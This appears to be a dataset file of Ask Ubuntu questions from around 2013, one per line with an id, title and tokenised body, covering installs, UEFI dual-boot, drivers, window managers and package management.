311314	top ( most ) windows hidden underneath top ubuntu panel ( 13.04 gnome-fallback-compiz ( gnome-panel ) )	is there a way to fix the annoying fact that the top of most windows when opened are hidden underneath the top ubuntu panel . meaning when i start an application like firefox , chromium or thunderbird for instance each time i have to alt-right click and drag the window down to be able to see and acces the top menu items in the mentioned programs . so it 's solvable , but remains a nuisance that a new firefox window ( as example ) does n't open below the top ubuntu panel . is there a way to make the panel 'solid ' ? that nothing can be under them ? ? did a few tests ; for music i use audacious and somehow ubuntu remmebers that audacious should be center screen . so no problem there . but all programs with larger windows ( allmost full screen like firefox and thunderbird in my case ) open with the top hidden underneath the top ubuntu panel . and the same ( regardless window-size ) is the case for programs i barely use/never open . just tested this with rubyripper ( have n't ripped a cd in years ) . everything opens in the top left corner off the screen with the top under the top panel . any tips ? ? my gnome version is 3.6.3 . the computer is a hp compaq nc6320 laptop and i 've done distribution upgrades starting with 11.04 . i ( think ) i restored the gnome 3 settings to theri defaults by deleting the gnome2 , .gconf and .gconfd folders and logging out an back into the xserver again . and followed this : how can i reset compiz to the default settings ? for compiz , but the issue remains . [ in compiz settings manager there is a plugin window rules , perhaps some parameters must be changed there , but i 've no idea which.. ] this question has been asked before , see : window top panel hidden ( 12.04 ) and top of the window hidden beneath panel ( 10.04 ) so different ubuntu versions and the answers are 'drag the windows downwards ' which is not a solution but a quick temporary fix . [ if screenshots are required and i can post them somewhere ; will do.. ]
311322	my web cam is not working	my web cam device has suddenly stopped working without any reason . even it worked some days ago . its saying that , `` no device found '' . what should i do ? i 'm currently using acer aspire 5100 notebook .
311331	installing ubuntu 13.04 as dual boot on a pre installed windows 8 gives internal error	i downloaded ubuntu 13.04 ( amd 64 bit ) iso to install it as a dual boot on my sony vaio svt14116pn . it has a pre-installed windows 8 pro with secureboot enabled . here are the steps i followed : disabled secureboot on the bios disabled uefi in the bios disabled fast shutdown in windows 8 created bootable usb drive using universal usb installer . ( 1.9.3.5 ) i have created a 50 gb partition in windows 8 it starts to boot from usb and displays the choice screen asking whether to try or install ubuntu . i clicked `` install ubuntu '' . since i use a 3g data card to connect to the internet , i had to continue installation without internet connection . after which i get to the following screen : : no matter which button i click ( + , - , change , continue ) i get this error : it says ubuntu encountered an internal error . i tried creating the usb again but it didnt work ... any help ? ? this is the error report :
311333	clickling on a open nautilus window 's icon opens new window	when i connect an external harddrive to my computer and open it using nautilus ( for browsing files ) , clicking on the nautilus icon ( which has an open window indicator ) just open a new nautilus window , instead of focusing on the harddrive window . scrolling on the icon using the mouse-wheel does focus the right window . it does n't happen when the open window is of folder on the current computer . what can i do to fix this ? alternatively , how , when i open my harddrive for file browsing , can i show the window under the harddrive icon in the launcher rather under the nautilus icon ?
311335	set new window to open at center of the screen - xubuntu	how to set newly opened window at the center of the screen in xubuntu ? is it possible ? in ubuntu it can be easily done by compiz config setting manager .
311338	when to remove usb stick after install ?	just installed 13.04 from usb stick , it said needed to restart to complete , but just rebooted to the gnu grub screen.. no new options , just try ubuntu , install it , or check disc for errors.. tried again and took the usb stick out right after i clicked restart and it froze.. it wo n't load without the stick in.. tried this install three times now..
311346	what happens to the file system when you `` install alongside '' during install,	i have a macbook with a 200gb partition and 50gb free space . when i boot from a usb stick to install ubuntu 13.04 the installer gives me the option of `` installing alongside mac os x '' or `` something else '' . i 'm happy partitioning drives etc but i 'm just curious about what the installer does to the file system in the first option .
311349	how do i show a message with username and date at login ?	how to show the message `` hello $ username , today 's date is $ date '' as soon as you login to ubuntu .
311353	developer.ubuntu.com - only for mobile apps now ?	i tried to look there for some guides for desktop application development , as i had done before , but found none ! is it only a temporary problem because of ubuntu going mobile , or i should look someplace else ?
311355	dual boot with windows 7 !	i 'm using windows 7 right now . i want to install ubuntu with dual boot . is is safe ? and does the process go safely ?
311361	sony t series ubuntu installation	i 'd like to install ubuntu 12.10 to my sony vaio laptop ( sony t series , w/o dvd ) i made a bootable usb or i tried to use external dvd reader via usb port . in each method , i can not see a partition or hard disk in installation steps . i tried everthing that i can do , but could n't achieve to install . i want to use ubuntu in my laptop , please , help me about installation
311363	stop syncing this folder button does n't work	i want to delete one of my synced folders ( not the ubuntu one folder ) from the cloud . i know , i have to press the `` stop syncing this folder '' button and i tried several times . i also see a message to confirm that i really want to delete the folder . after i press `` ok '' nothing happens . my folder is still there . can anyone help ? support does n't answer . p.s . the folder is quite large , over 10 gb . i guess , that 's something to do with the problem
311364	does the ntfs-3g driver still corrupt disks/files/folders ?	as i said in the title , does the ntfs-3g driver still corrupt disks/files/folders on ntfs disks ? i have heard a lot of people having problems with the driver . is that still the case , or have the developers `` fixed '' the driver ?
311369	when i start virtualbox 4.2 in ubuntu 12.10 via terminal , what do the warnings mean ?	when i start virtualbox in the terminal , the following warning messages shows up : qt warning : void dbusmenuexporterprivate : :addaction ( qaction* , int ) : already tracking action `` '' under id 16 qt warning : void dbusmenuexporterprivate : :addaction ( qaction* , int ) : already tracking action `` & pause '' under id 17 qt warning : void dbusmenuexporterprivate : :addaction ( qaction* , int ) : already tracking action `` & reset '' under id 18 qt warning : void dbusmenuexporterprivate : :addaction ( qaction* , int ) : already tracking action `` d & iscard saved state ... '' under id 24 qt warning : void dbusmenuexporterprivate : :addaction ( qaction* , int ) : already tracking action `` re & fresh ... '' under id 25 qt warning : void dbusmenuexporterprivate : :addaction ( qaction* , int ) : already tracking action `` show in file manager '' under id 27 qt warning : void dbusmenuexporterprivate : :addaction ( qaction* , int ) : already tracking action `` create shortcut on desktop '' under id 28 what do they mean ?
311373	can not uninstall bitdefender	i installed bitdefender on my ubuntu 12.04 machine a little while ago , but have since realised that the ppa no longer has a folder to support the precise distro , thus i can not update the bitdefender software and i am getting all sorts of error messages . i have decided to uninstall bitdefender , but my problem is that when i run the standard command line commands to uninstall* , i am told that the bitdefender package can not be found . i have done a root folder search for bitdefender , and the packages are definitely there , i just ca n't do anything with them . is there any solution to this ? *the commands i have tried are : sudo apt-get remove bitdefender-scanner sudo apt-get purge bitdefender-scanner sudo apt-get purge bitdefender-scanner-gui sudo apt-get purge bitdefender-scaner bitdefender-scanner-gui many thanks in advance !
311378	how to create a bash scrip that calls other scripts depending on commandline swith	i 'm extremely new to bash and need to create a script that calls another script depending on what command line switch is taken . let 's call it stuff.sh than stuff.sh -- help should behave like help does in a normal program and give a list to the user what he can do -a you can do stuff like that . -b you can do stuff like that . -c this is extremely fancy stuff . when i execute the script with stuff.sh - a it should do something , let 's say call another script with sudo in front of it . how could i do that ? any ideas that everybody how is new to bash can understand easily ? thank you !
311380	how can i import data from one ubuntu version ( say 11.04 ) to 12.04. ?	i want to import some bookmarks , browser history , and contents of my home directory . i have both 11.04 and 12.04 installed on my system . is there any way to import my data from older version ?
311383	installing gnome 3.8 on ubuntu 13.04 fails	i just followed these instructions http : //www.techrepublic.com/blog/ope ... on-ubuntu/4343 on a fresh installed ubuntu 13.04 and it crashed during installation with the following error message : code : processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.8.0-25-generic cp : can not stat ‘/module-files.d/libpango1.0-0.modules’ : no such file or directory cp : can not stat ‘/modules/pango-basic-fc.so’ : no such file or directory e : /usr/share/initramfs-tools/hooks/plymouth failed with return 1. update-initramfs : failed for /boot/initrd.img-3.8.0-25-generic with 1. dpkg : error processing initramfs-tools ( -- configure ) : subprocess installed post-installation script returned error exit status 1 processing triggers for ca-certificates ... updating certificates in /etc/ssl/certs ... 0 added , 0 removed ; done . running hooks in /etc/ca-certificates/update.d ... . done . done . processing triggers for ureadahead ... errors were encountered while processing : initramfs-tools e : sub-process /usr/bin/dpkg returned an error code ( 1 ) any idea what this is ? many thanks ,
311386	installed ubuntu alongside windows 8 , and w8 wo n't boot anymore	i 've bought a dell laptop with w8 pre-installed . i did n't like w8 much , so i wanted to try ubuntu , but without uninstalling w8 . so yesterday i installed ubuntu , and it was extremely convoluted thanks to the gorgeous w8 uefi boot mode . anyway ubuntu is now installed and working with no problem . however i can not boot on w8 anymore , which is a serious issue . i tried boot repair , first with the boot option in legacy mode , then in uefi . boot repair tells me it got it fixed , but i still ca n't boot on w8 . when i boot , i have two options to boot on windows : windows uefi bkpbootmgfw.efi and windows boot uefi loader . when i select any of them , i got the following error : no such device bce6-e3c4 /efi/microsoft/boot/bkpbootmgfw.efi not found . or no such device bce6-e3c4 /efi/boot/bkpbootx64.efi not found . i checked on my computer , and unexpectedly , i did find the two files , located at /boot/efi/efi/microsoft/boot/bkpbootmgfw.efi or /boot/efi/efi/boot/bkpbootx64.efi . my computer has 2 hard drives . when i got the computer , the second one was empty , so i decided i 'd install ubuntu on my second hard drive , and keep w8 on my first one . maybe that 's the problem , maybe the bios or whatever it is is looking in the first hard drive for the efi files , while they are supposedly in the second one . i 've tried lots of stuff on the internet ( like updating grub 's config ) but nothing 's worked so far . boot repair told me to paste this link if i need help , so here we go : http : //paste.ubuntu.com/5789091/ i read but that did n't help me much . does anyone know how to fix this ? i can still access to my data on my first hard drive , but i still have many useful programs on windows . i notably program in c++ for windows , so i must , in order to compile for the os , boot on windows .
311389	universal ( across des ) file indexing ( desktop search ) and launcher ?	i am running ubuntu 13.04 . i often switch between gnome and kde . each has a desktop search and launcher . in gnome , search box on hitting windows key is supposed to provide search results ( including files with matching names , matching content , applications , etc . ) and in kde , krunner does the same . both des use their own indexing and searching applications . is not there a way by which this is shipped out to a third party application ? that single application will search and index all the files . a global keyboard shortcut launches that application and off you go . i had tried kupfer and it works excellently -- except that kupfer does not index the contents of the files . is there any solution ?
311390	is the whole desktop of linux deepin available to install in ubuntu ?	title says all . is there any repository from which i can simply `` sudo apt-get install '' the deepin desktop with all the applications related ? i find unity really usable , but very ugly , and i 'm curious to try out the other desktops around . i ran into an article about deepin and it looks promising . i 'm not interested in their software centre only ! is there a way to install it in my current ubuntu as an alternate desktop ?
311394	when will ubuntu touch be available for sony xperia z ?	when will ubuntu touch be available for sony xperia z ? i really want to use ubuntu touch for the xperia z .
311401	libusb-0.1.so.4 shared lib error in ubuntu 64 bit system	i am trying to install zte mf191 driver in ubuntu 12.04 64 bit machine . i am not sure is it support 64 bit or not . but it works fine in 32bit system . these driver package has a executable file named zr when i try to run this it throws an error libusb-0.1.so.4 : can not open shared object file : no such file or directory i googled it but ca n't find a way to install ( lib ) it . some people suggested to install 32bit version but i ca n't find one in synaptic . please help .
311409	ndis driver installation failed while installing e303c huawei modem in ubuntu 13.04	installation of the driver for the huawei modem fails with the following error : error : install ndis driver failed.the compiling environment is not all ready . please check gcc , make and kernel build to be all installed . please answer in non technical terms , i 'm new to linux ( do n't even know commands properly ) .
311410	maas minimum requirements with juju-jitsu ?	i 've browsed through so many different sites and found so much contradictory information . as i am getting tired of this and do belive this question affects many other users , so i would like to collect the `` once and for all times '' answer . unfortunately , the documentation on maas and juju is ... well , not the best , sorry to say that . what are the minimum system requirements for setting up a maas cluster , which is going to be orchestrated with juju-jitsu ? do they need to have the exact system specifications or can i just combine different hardware ? what are the minimum requirements for the master machine ? e.g . `` you need at least 8gb of ram , a dual core cpu with at least 3.0 ghz . '' how many machines to i need to deploy maas on ? i 've read six machines , nine machines , and so on . i clearly want to know : `` you need one for the master and e.g . five nodes . '' do i need to attach as many nics ( network interface cards ) to my master machine as there are nodes , or can i simply attach two nics and a switch ? one nic for connecting to the internet , one for handling the maas tasks , connected to a switch , which connects my nodes to the master ? is juju now ready for local deployment ? the last time i experimented with juju and had to reboot my machine , the services orchestrated by juju were gone . this was an issue i also found on the official juju site . unfortunately , as mentioned above , the documentation is not the best , so i could not find the necessary info on that again . so : can i use juju on a local environment or will a reboot break my setup ?
311411	how can i remove packages without other packages ?	i 'm using 13.04 , and i want to remove unused packages . ex . gnome-power-manager , but i ca n't . bekir @ home : ~ $ sudo apt-get remove gnome-power-manager reading package lists ... done building dependency tree reading state information ... done the following packages will be removed : gnome-power-manager ubuntu-desktop 0 upgraded , 0 newly installed , 2 to remove and 0 not upgraded . after this operation , 1.690 kb disk space will be freed . do you want to continue [ y/n ] ? i do n't want to remove ubuntu-desktop because he contains other packages . i want to make minimal/simply ubuntu system for me . can anyone help me ?
311424	install ubuntu 13.04 on uefi mode	i want to install ubuntu 13.04 next to windows 8 , but there is this stupid uefi . i created a partition for ubuntu , but when i want install ubuntu ( live-usb ) , it does n't detect windows 8 and does n't detect correctly the partition i created . so , i 'm burning a live-dvd but when i want to boot it , it boot on windows 8 ... how can i install ? there is my boot url : http : //paste.ubuntu.com/5736699/ thanks .
311438	how to make /tmp executable ?	i have ubuntu 12.04 lts and i tried to upgrade to ubuntu 12.10 . when i clicked in the update manager upgrade a messagebox apeared : can not run the upgrade . this usually is caused by a system where /tmp is mounted noexec . please remount without noexec and run the upgrade again . i tried to make /tmp executable in terminal with the following command : mount -o remount , exec /tmp /var/tmp i pressed enter and i got the following message from terminal : mount : only root can do that what should i do now to make /tmp executable and upgrade the os .
311441	how to recursively set permissions for files only ?	i want to remove executable permission for all files in my home folder , recursively , how to do that using command line ?
311444	dialog box obscured	i am using intellij idea java ide . much ( but not all ) of the time , the buttons on dialog boxes are cutoff . i do n't believe the problem is specific to intellij , but it is the tool i use the most . most of the tools that do this are java-based . does anyone know a solution for this ? i 'd hate to hit the button confirming the destruction of something important .
311447	how do i ssh to machine a via b in one command ?	i want to access a computer , say machine a which is based in my university 's network . however , this computer is only accessible via the internal network of the university , so i can not use ssh to this computer from home directly . here 's what i do now : log in to a different university machine , say machine b ( this machine b is accessible via ssh from my home computer . ) use ssh on b to connect to a . is there a way to do that faster ? using only one ssh command .
311453	flash plugin not working properly in lubuntu 13.04	flash player is not working properly . i am getting video displayed with shades of different colour . the problem is only in lubuntu 13.04 . 12.10 worked properly , and my other os on the same system works properly as well .
311455	ubuntu 12.04 cryptsetup failing	i recently updated my ubuntu 12.04 , and after i restarted the computer just hangs at the following after i type my decrypt password : '' cryptsetup : sda5_crypt set up successfully '' i do n't know how i can debug as the system does not respond to any commands other than ctrl , alt , delete . it is very important for me to save the installation . does anyone any idea for a starting point of debugging ? recovering ? i am running a lenovo w520 , ubuntu 12.04 64b edit : i am able to log into recovery mode , but when i restart i get the same error .
311460	how can i put a button on the desktop to shutdown pc ?	how can i put a button on the desktop to shutdown pc ? i use ubuntu 13.04 with unity . thank you for a help
311462	will 4000 mb be enough for all the download work needed to install ubuntu ?	i am a windows user and i am looking forward to using ubuntu 12.04 , however there are some difficulties i want to discuss . first off i am using a pentium 4 pc ram 4 gb and 160 gb hard disk , processor 3.00 ghz . will ubuntu run seamlessly and faster than windows 7 that i have ? secondly , i access the internet using huawei tata photon+ device . will that work on ubuntu ? most importantly , i have a balance of 4000 mb left , will that be enough for all the download work needed ( say by the exe installer ) . thanks a lot fellas .
311463	ubuntu touch porting : bad file tree	i 'm trying to port ubuntu touch to samsung galaxy s plus but i 'm finding it really difficult . the problems at first were to find a good cm rom as base , because this device is not officially supported by cm . currently i 'm using ehndroixiii but now i 'm founding a lot of problems with the porting guide . in particular my file tree seems totally different from the one of the guide . for example , there is no device folder . what can i do to solve ? should i create those files ? my repository is https : //github.com/fcole90/utouch-sgsp.git
311467	dotdeb alternatives for ruby or python ?	i really like dotdeb , but it does n't include packages for ruby and python . while i could build my own repository , i would n't want to reinvent the wheel ( and then be forced to drive ) . are there any good public repositories like dotdeb for other languages like ruby or python ? dotdeb 's selling point for me is the immediacy ( the php 5.5 package was realeased on the day 5.5 was released ) and the reliability ââ it just works .
311468	ubuntu 12.04 lts error when checking for software updates	since 20th june 2013 i have tried running the software updater in ubuntu 12.04 lts however it runs but returns this error w : failed to fetch http : //au.archive.ubuntu.com/ubuntu/dists/precise-updates/main/source/sources 406 not acceptable , e : some index files failed to download . they have been ignored , or old ones used instead . it seems to tell me my internet is not connected but it is at the time of the update . could anyone let me know what the problem is and where there might be a fix for it ?
311471	extract documents from exe file	my school provide us with a free training software which includes all the stuff we need for study but the problem is that it comes in exe format so i was thinking is there any way to extract the output files like pdf 's compressed inside without running the exe through wine as it crashes on start and useless for me in this case .
311472	can not install wine 1.4 on ubunru 12.04 running on a ibook g4	in synaptic when set to install says package broken kevin @ ubuntu : ~ $ sudo apt-get install wine [ sudo ] password for kevin : reading package lists ... done building dependency tree reading state information ... done package wine is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'wine ' has no installation candidate kevin @ ubuntu : ~ $
311483	touch screen not recognize by ubuntu 13.04	i have a lenovo c315 10038 : after install ubuntu 13.04 64bits i 've installed sudo apt-get install xserver-xorg-input-* and nothing this is the infor from lsusb , lspci , xinput commands xinput ⎡ virtual core pointer id=2 [ master pointer ( 3 ) ] ⎜ ↳ virtual core xtest pointer id=4 [ slave pointer ( 2 ) ] ⎜ ↳ usb optical mouse id=9 [ slave pointer ( 2 ) ] ⎣ virtual core keyboard id=3 [ master keyboard ( 2 ) ] ↳ virtual core xtest keyboard id=5 [ slave keyboard ( 3 ) ] ↳ power button id=6 [ slave keyboard ( 3 ) ] ↳ video bus id=7 [ slave keyboard ( 3 ) ] ↳ power button id=8 [ slave keyboard ( 3 ) ] ↳ lenovo usb2.0 uvc camera id=10 [ slave keyboard ( 3 ) ] ↳ at translated set 2 keyboard id=11 [ slave keyboard ( 3 ) ] lsusb bus 001 device 003 : id 0ac8 : c412 z-star microelectronics corp . bus 001 device 004 : id 0ac8 : c41e z-star microelectronics corp . bus 003 device 002 : id 0461:4d80 primax electronics , ltd bus 001 device 005 : id 0ac8 : c41e z-star microelectronics corp . bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub lspci 00:00.0 host bridge : advanced micro devices [ amd ] nee ati rs690 host bridge 00:02.0 pci bridge : advanced micro devices [ amd ] nee ati rs690 pci to pci bridge ( pci express graphics port 0 ) 00:04.0 pci bridge : advanced micro devices [ amd ] nee ati device 7914 00:05.0 pci bridge : advanced micro devices [ amd ] nee ati rs690 pci to pci bridge ( pci express port 1 ) 00:12.0 sata controller : advanced micro devices [ amd ] nee ati sb600 non-raid-5 sata 00:13.0 usb controller : advanced micro devices [ amd ] nee ati sb600 usb ( ohci0 ) 00:13.1 usb controller : advanced micro devices [ amd ] nee ati sb600 usb ( ohci1 ) 00:13.2 usb controller : advanced micro devices [ amd ] nee ati sb600 usb ( ohci2 ) 00:13.3 usb controller : advanced micro devices [ amd ] nee ati sb600 usb ( ohci3 ) 00:13.4 usb controller : advanced micro devices [ amd ] nee ati sb600 usb ( ohci4 ) 00:13.5 usb controller : advanced micro devices [ amd ] nee ati sb600 usb controller ( ehci ) 00:14.0 smbus : advanced micro devices [ amd ] nee ati sbx00 smbus controller ( rev 14 ) 00:14.1 ide interface : advanced micro devices [ amd ] nee ati sb600 ide 00:14.2 audio device : advanced micro devices [ amd ] nee ati sbx00 azalia ( intel hda ) 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati sb600 pci to lpc bridge 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati sbx00 pci to pci bridge 00:18.0 host bridge : advanced micro devices [ amd ] family 10h processor hypertransport configuration 00:18.1 host bridge : advanced micro devices [ amd ] family 10h processor address map 00:18.2 host bridge : advanced micro devices [ amd ] family 10h processor dram controller 00:18.3 host bridge : advanced micro devices [ amd ] family 10h processor miscellaneous control 00:18.4 host bridge : advanced micro devices [ amd ] family 10h processor link control 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati rv710/m92 [ mobility radeon hd 4530/4570/545v ] 02:00.0 ethernet controller : broadcom corporation netlink bcm5787m gigabit ethernet pci express ( rev 02 ) 05:00.0 network controller : broadcom corporation bcm4312 802.11b/g lp-phy ( rev 01 ) 08:00.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller ( rev 05 ) 08:00.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 22 ) 08:00.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 12 ) 08:00.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 12 )
311487	what packages add support for different vpn types to network manager ?	what vpn types does network manager support , and what packages do i specifically need to install to allow the support of those vpn protocols ?
311488	how do i set default font for amharic on ubuntu ?	i have this font that i want to use for amharic/ethiopic , while leaving the default for other characters , notably latin . the problem is my ubuntu os seem to have a random way of choosing from among the numerous ethiopic fonts i have installed . i do n't wa n't to choose my preferred ethiopic font as the system default either as i do n't like the latin characters it has . any advice on how i can manipulate or configure this ?
311491	question about 0x08059081	currently doing some homework to improve my skills . i tried to run a file by using gdb , but i encountered 2 errors as shown in the picture below . 0 0x08059081 1 0x080493c6 may i know what is # 0 and # 1 ? i would like to know what is this `` 0x08059081 '' is called . the name , address or reference something like that ? and how can i know its value ? is there some way to determine its value or name etc ?
311496	alternative for mendeley for ubuntu	mendeley is essentially ( for me ) a software that saves the following data : a file tags associated to the file in practice the files are research papers and the tags are things like author , title etc . is there any software ( preferably open source ) that allows one to do the same thing in ubuntu ? in mendeley the data is stored online ( on their server ) and therefore i can access the research papers from any computer . i would prefer if the suggested software could the same thing ( but i get to choose where it should be saved ) . but maybe if i 'm only able to store things locally i could be able to simulate access-from-everywhere using git and a web server ?
311500	i ca n't find my `` windows 8 '' partition	my girlfriend had her dell pre-installed with windows vista when she bought it , then she upgraded it to windows 7 and then 8.since she wanted an operating system which is fast and powerful i suggested ubuntu for her.she runs a dell inspiron 1420 with 2 gigs of ram and an nvdia 8400m gs , though the laptop is a bit old , it does her things like a dream . so , i have used a flash drive ( 8 gigs ) to install ubuntu 13.04 on her system and used `` overwrite the windows 8 os '' .then afterwards when i logged in i ca n't find any of her files which was on her windows 8 installation . anyone know a work around with this ? !
311504	benefits of updating the ubuntu 12.04 ?	i am using ubuntu 12.04 lts .what are the benefits of updating by update manager ?
311508	how to access my saved files on a persistent liveusb ?	i have been using a persistent mode usb when the hard disk of my laptop crashed . i like to mount the usb files on another computer running ubuntu 12.10 . from what i found after internet search , the file system is saved as squashfs file . the only squashfs file was /casper/filesystem.squashfs . i mounted this file using disks application ( it used /dev/loop0 device ) . however , i could not find the files that i had saved while running from the usb . the files were saved in /home/ubuntu/downloads . the mounted filesystem has no folder under the home directory . what should i do to retrieve the file on this computer . i do not have the permission to reboot this computer from the persistent usb . i just need the files saved inside the persistent file .
311516	how do you install ubuntu 13.04 on a custom built computer using a cd ?	i need help . i recently built a computer using parts in my house . this computer does not currently have an os . so i would like to set up the bios so that it would install it automatically . here is it 's specs os : none hdd:160 gb ram : 2 gb cpu : intel pentium 4 @ 2.66 ghz
311517	how do i connect to an energy efficient ethernet enabled switch ?	is ubuntu ready for energy efficient ethernet ? i tried to connect to a 1gbit eee switch but it failed , syslog says : networkmanager [ 1041 ] : < info > ( eth0 ) : deactivating device ( reason 'carrier-changed ' ) i succesfully connected to 100mbit and 1gbit switches without eee . if i force it to use 100mbit : sudo mii-tool -f 100basetx-fd it works . here is the output of sudo mii-tool -v -v : for connection with 100mbit switch : using siocgmiiphy=0x8947 eth0 : negotiated 100basetx-fd flow-control , link ok registers for mii phy 1 : 1140 796d 006e 3211 0de1 45e1 0007 2001 0000 0300 0000 0000 0000 0000 0000 3000 0000 6c40 0000 5c50 0080 0000 0000 0000 2d00 4177 1000 0004 0000 0000 0030 e088 product info : vendor 00:1b:8c , model 33 rev 1 basic mode : autonegotiation enabled basic status : autonegotiation complete , link ok capabilities : 1000baset-hd 1000baset-fd 100basetx-fd 100basetx-hd 10baset-fd 10baset-hd advertising : 100basetx-fd 100basetx-hd 10baset-fd 10baset-hd flow-control link partner : 1000baset-hd 1000baset-fd 100basetx-fd 100basetx-hd 10baset-fd 10baset-hd flow-control for connection with a regular 1gbit switch : using siocgmiiphy=0x8947 eth0 : negotiated 1000baset-fd flow-control , link ok registers for mii phy 1 : 1140 796d 006e 3211 0de1 c5e1 000f 2001 4d07 0300 3800 0000 0000 0000 0000 3000 0000 ac40 0000 5c18 0001 0000 0000 3633 2d00 4177 1000 0004 0000 0000 0030 e088 product info : vendor 00:1b:8c , model 33 rev 1 basic mode : autonegotiation enabled basic status : autonegotiation complete , link ok capabilities : 1000baset-hd 1000baset-fd 100basetx-fd 100basetx-hd 10baset-fd 10baset-hd advertising : 1000baset-fd 100basetx-fd 100basetx-hd 10baset-fd 10baset-hd flow-control link partner : 1000baset-hd 1000baset-fd 100basetx-fd 100basetx-hd 10baset-fd 10baset-hd flow-control for connection with 1gbit eee switch : using siocgmiiphy=0x8947 eth0 : no link registers for mii phy 1 : 1140 7949 006e 3211 0de1 cde1 000d 2001 0000 0300 0c00 0000 0000 0000 0000 3000 0000 2000 0000 3850 0000 0000 0000 0000 2d00 4177 1000 0004 0000 0000 0030 e088 product info : vendor 00:1b:8c , model 33 rev 1 basic mode : autonegotiation enabled basic status : no link capabilities : 1000baset-hd 1000baset-fd 100basetx-fd 100basetx-hd 10baset-fd 10baset-hd advertising : 1000baset-hd 1000baset-fd 100basetx-fd 100basetx-hd 10baset-fd 10baset-hd flow-control link partner : 1000baset-hd 1000baset-fd 100basetx-fd 100basetx-hd 10baset-fd 10baset-hd flow-control here is the output of lspci -nnk | grep -iea3 `` ( ethernet|network ) '' : 04:00.5 ethernet controller [ 0200 ] : jmicron technology corp. jmc250 pci express gigabit ethernet controller [ 197b:0250 ] ( rev 03 ) subsystem : clevo/kapok computer device [ 1558:5130 ] kernel driver in use : jme kernel modules : jme 05:00.0 network controller [ 0280 ] : intel corporation centrino wireless-n 1000 [ 8086:0083 ] subsystem : intel corporation centrino wireless-n 1000 bgn [ 8086:1305 ] kernel driver in use : iwlwifi kernel modules : iwlwifi uname -a : linux user-b5130m 3.2.0-48-generic # 74-ubuntu smp thu jun 6 19:43:26 utc 2013 x86_64 x86_64 x86_64 gnu/linux
311518	wireless problems after resume	[ edit 3 : before you read all of this , i do n't think this is a software issue anymore , so i 'm not sure if there 's a real solution that can be offered . i saw this video and read some of the comments . it appears this is probably my issue . here is my reasoning . ( 1 ) my wife has an identical comp with the same os and the same updates . no issues . ( 2 ) i have tried multiple combinations of kernels and iwlwifi firmware . each have the same problem . ( 3 ) when i remove all of the iwlwifi firmware and use a usb wireless adapter , everything works great . ( 4 ) when i jostle it ( like when i open the lid on resume ) it is more apt to crash . put together , i 'm going the hardware route . thanks for people who read and upvoted. ] my laptop ( asus u56e ) is having problems with its wireless . it either ( 1 ) randomly disconnects or ( 2 ) crashes the entire system . the most consistent way i can reproduce it , is putting the laptop to sleep and changing the power state ( i.e. , unplugging if it was plugged in or vice versa ) . here is my wireless card : $ lspci | grep -i wireless 02:00.0 network controller : intel corporation centrino wireless-n + wimax 6150 ( rev 67 ) i have had similar problems on elementary luna beta 2 and lubuntu 13.04 ( so i do n't think it 's kernel related because they use different kernels ) . i 've done fresh installs of each . most recently in lubuntu , after toggling the power state during a suspend , it would not resume . on the screen it read : [ 102.433193 ] i2400m_usb 1-1.1:1.0 : device reset on resume : reinitializing driver [ 150.661359 ] iwlwifi 0000:02:00.0 : failed to load firmware chunck ! [ 150.661359 ] iwlwifi 0000:02:00.0 : could not load the [ 0 ] ucode section [ 150.661433 ] iwlwifi 0000:02:00.0 : failed to start rt ucode : -110 [ 151.000810 ] iwlwifi 0000:02:00.0 : unable to initialize device . this has been an ongoing thing for the past 2 weeks . can someone point me in a direction here ? is this most likely ( 1 ) a driver or other software issue or ( 2 ) a hardware issue ? if it 's a driver/software issue , i 'll gladly provide more information . i 'm just out of my element here . i 'm desperate ! [ edit : wireless seems to have a tough time resuming after the computer has been suspended for a lonerg period of time ( > 30 mins ) . ] [ edit2 : when i run into the wireless issue , it appears the my wlan1 dissapears . is there a way to get it back ? for example , when i reboot my computer and run iwconfig i get the following : lo no wireless extensions . wlan1 ieee 802.11bg essid : '' hampnet '' mode : managed frequency:2.437 ghz access point : 14:35:8b:00:49:38 bit rate=54 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=66/70 signal level=-44 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:3 invalid misc:63 missed beacon:0 eth0 no wireless extensions . but when my computer fails after a resume or the wireless simply crashes , my iwconfig looks like this . lo no wireless extensions . wmx0 no wireless extensions . eth0 no wireless extensions. ]
311527	ubuntu 's installer goes to a black screen	i just got a new laptop . every time i try to install ubuntu the screen goes black and it stays black . then , right before i shut down the computer i see a flicker of ubuntu and i am not sure what to do . i have used this same flash drive to install this operating system on four other computers and this has never happened . how do i fix this ?
311529	how to fix the unity problem ?	today , i just tried to turn on my computer ( acer 8935g , ubuntu 13.04 ) , and the only things that showed up are the desktop icons . the toolbar and the applications disapeared . i try to fix this problem by using the command `` ccsm '' but when i enable opengl , it automatically disables itself ! that 's why the unity plugin could not be enabled ... anyway , i have tried all sorts of things , it did n't help at all ... the interface is still absent . i hope you could help me . ( sorry for my bad english )
311533	ubuntu freezes on first boot on samsumg series 9	i have just wiped windows 8 from my samsumg series 9 by installing ubuntu 12 64 bit over it through usb . i have fast bios mode disabled and os mode selection set to csm os and the boot usb removed from the laptop after installation . when reboot from hard disk , i have 4 choices ( grub version 1.99-21ubuntu3.9 ) ubuntu , with linux 3.5.0-23-generic ubuntu , with linux 3.5.0-23-generic ( recovery mode ) memory test ( memtest86+ ) memory test ( memtest86+ , serial console 115200 ) i picked 1 and screen turned black with a cursor flashing . note that i am not having a dual boot machine . i am stuck at this screen , please somebody help , i really do n't want to revert back to windows .
